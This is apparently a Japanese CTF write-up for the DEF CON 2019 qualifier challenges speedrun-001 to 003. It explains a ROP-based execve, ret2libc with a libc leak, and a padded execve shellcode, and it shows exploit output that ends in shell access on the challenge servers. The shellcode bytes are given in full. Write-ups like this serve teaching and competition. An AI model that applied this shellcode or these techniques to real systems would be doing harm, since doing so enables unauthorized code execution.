DEF CON CTF Qualifier 2019 speedrun-001~003
speedrun-001
$ ./speedrun-001
Hello brave new challenger
Any last words?
hoge
This will be the last thing that you say: hoge
Alas, you had no luck today.
バッファオーバーフローがあるので,ROPで execve("/bin/sh", NULL, NULL) を呼ぶようにした.
$ python exploit.py
[+] Opening connection to speedrun-001.quals2019.oooverflow.io on port 31337: Done
Hello brave new challenger
Any last words?
[*] Switching to interactive mode
This will be the last thing that you say: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x86\x06@
$ ls
-
banner_fail
bin
boot
dev
etc
flag
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
service.conf
speedrun-001
srv
sys
tmp
usr
var
wrapper
$ cat /flag
OOO{Ask any pwner. Any real pwner. It don't matter if you pwn by an inch or a m1L3. pwning's pwning.}
[*] Got EOF while reading in interactive
speedrun-002
$ ./speedrun-002
We meet again on these pwning streets.
What say you now?
hoge
What a ho-hum thing to say.
Fare thee well.
これも同様バッファオーバーフローがあり,ROPからret2libcでsystemを呼ぼうとしたがローカルではうまくいくのにリモートではうまくいかない問題が起きてて,どうやらリモートではsystem関数が使えないように制限されてたっぽいので,001同様直接システムコールを使うようにしたらシェルが取れた.
$ python exploit.py
[+] Opening connection to speedrun-002.quals2019.oooverflow.io on port 31337: Done
[*] '/home/yyy/ctf/all/DEF_CON_2019/speedrun-002/speedrun-002'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] '/home/yyy/ctf/all/DEF_CON_2019/speedrun-002/libc/lib/x86_64-linux-gnu/libc-2.27.so'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
We meet again on these pwning streets.
What say you now?
What an interesting thing to say.
Tell me more.
Fascinating.
leak_addr: 0x7f4b03669140
libc_base: 0x7f4b03559000
system_addr: 0x7f4b035a8440
We meet again on these pwning streets.
What say you now?
What an interesting thing to say.
Tell me more.
Fascinating.
[*] Switching to interactive mode
$ cat /flag
OOO{I_didn't know p1zzA places__mAde pwners.}
$ exit
[*] Got EOF while reading in interactive
speedrun-003
$ ./speedrun-003 Think you can drift? Send me your drift hoge You're not ready.
シェルコード問題.30バイトのシェルコードを入力する必要があり,前半部分それぞれをxorした値と後半部分それぞれをxorした値が等しくないといけない.
48 bb 2f 62 69 6e 2f movabs rbx,0x68732f6e69622f 73 68 00 31 f6 xor esi,esi 56 push rsi 53 push rbx 54 push rsp 5f pop rdi b0 3b mov al,0x3b 31 d2 xor edx,edx 0f 05 syscall
シェルコードはこのようなものを使用したが,これは22バイトなのでいい感じに調整した.具体的には,前半部分を push rsp までにして,残りの部分は xor edx, edx を4つに増やすことでバイト数をかさ増ししたり,同じxor値になるように mov al, 0x3b を2つに増やし,前半の 0x3b の部分を変化させながら,最終的に mov al, 0x5a にした.
$ python exploit.py
[+] Opening connection to speedrun-003.quals2019.oooverflow.io on port 31337: Done
[*] Switching to interactive mode
Think you can drift?
Send me your drift
$ cat /flag
OOO{Fifty percent of something is better than a hundred percent of nothing. (except when it comes to pwning)}
$ exit
[*] Got EOF while reading in interactive
